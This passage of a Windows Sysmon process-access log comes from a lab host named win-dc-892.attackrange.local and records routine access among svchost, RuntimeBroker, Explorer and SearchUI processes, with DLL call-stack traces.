32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006763Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006762Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.352{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006761Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.352{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+
24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006760Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.337{266CAFBE-646C-6064-0C00-00000000AE01}5928C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006759Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006758Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006757Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006756Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.321{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+5bb0|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006755Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.321{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006754Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.321{266CAFBE-64C5-6064-A700-00000000AE01}43883032C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+
24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006753Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+bf29|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b063|c:\windows\system32\appreadiness.dll+beb1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000006751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa 10341000x80000000000000006750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+ba300|C:\Windows\System32\TwinUI.dll+ba677|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\combase.dll+567e1|C:\Windows\System32\combase.dll+566aa 10341000x80000000000000006749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x80000000000000006748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C4-6064-9B00-00000000AE01}49243696C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x80000000000000006747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-64C5-6064-A700-00000000AE01}43884064C:\Windows\System32\svchost.exe{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|c:\windows\system32\appreadiness.dll+4dc63|c:\windows\system32\appreadiness.dll+c033|c:\windows\system32\appreadiness.dll+b130|c:\windows\system32\appreadiness.dll+b71e|c:\windows\system32\appreadiness.dll+b625|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+5ff03|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c 10341000x80000000000000006744Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+18a6c|C:\Windows\SYSTEM32\psmserviceexthost.dll+e44e|C:\Windows\SYSTEM32\psmserviceexthost.dll+e4e7|C:\Windows\SYSTEM32\psmserviceexthost.dll+e1f2|C:\Windows\SYSTEM32\psmserviceexthost.dll+18e38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006743Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:02:31.306{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-646C-6064-1000-00000000AE01}1124C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000006742Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 